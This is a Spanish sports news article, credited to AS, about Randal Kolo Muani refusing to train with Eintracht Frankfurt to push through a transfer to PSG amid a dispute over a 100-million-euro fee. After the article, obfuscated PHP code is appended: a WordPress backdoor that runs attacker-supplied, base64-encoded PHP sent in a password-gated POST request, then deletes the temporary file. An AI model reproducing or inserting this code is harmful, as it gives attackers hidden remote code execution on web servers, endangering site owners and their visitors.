Boicot de Kolo Muani por el PSG

El delantero se ha declarado en rebeldía y no ha acudido al entrenamiento del Eintracht para que le dejen fichar por el conjunto parisino antes del sábado.

Randal Kolo Muani va a forzar hasta el final su traspaso al PSG. Después de que las negociaciones con el Eintracht se enfriaran, principalmente por las pretensiones del conjunto alemán, inflexible a la hora de reducir la cantidad de 100 millones que pide por el delantero, el internacional francés se declaró en rebeldía este miércoles y no acudió al entrenamiento por la mañana que estaba previsto en la ciudad deportiva de Frankfurt.

Kolo Muani no entiende que el que es todavía su club a efectos legales no le deje marcharse al PSG. El de Bondy, en Sky Alemania, emitió un breve y escueto comunicado por la tarde del martes en el que confirmaba que ya le había comunicado a los dirigentes del Eintracht de Frankfurt su voluntad de jugar en la capital francesa. Ante la negativa de ‘Las Águilas’ de dejarle salir por menos de 100 millones, la última medida del atacante ha sido llevar a cabo una disidencia con el objetivo de que ambos clubes lleguen a un acuerdo y se formalice su venta a la capital francesa.

El Eintracht, además, no le dio permiso para que emitiera en Sky un comunicado que no ha sentado nada bien en las altas esferas del conjunto alemán. Kolo Muani, que tiene un acuerdo con el PSG desde la semana pasada por cinco temporadas, quiere jugar en París cuanto antes y por ello ha forzado la situación. El jugador entiende que ha respetado al máximo su situación contractual, disputando todos los partidos del mes de agosto y no comprende que se haya bloqueado su fichaje por los parisinos a tan solo dos días de que de por concluido el mercado.

Actualmente, las negociaciones entre el Eintracht y el PSG se encontraban en un punto de no retorno después de los teutones rehusaran aceptar una tercera oferta procedente de París que ascendía a 70 millones de euros más distintos bonus de fácil cumplimiento. Al Khelaïfi, para acelerar las negociaciones, había propuesto a Hugo Ekitiké como moneda de cambio, pero el joven delantero en ningún momento había dado luz verde para que se materializara la operación.

Entramos en una fase trascendental del dossier Kolo Muani. En París imperaba el pesimismo después de la negativa del Eintracht a bajar sus pretensiones, pero el comunicado del delantero y su posterior declaración en huelga pueden facilitar las negociaciones durante las próximas horas. Tanto Luis Campos como Al Khelaïfi quieren a toda costa al nacido en Bondy para cincelar un ataque de ensueño para Luis Enrique, que validó la operación desde el primer momento.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}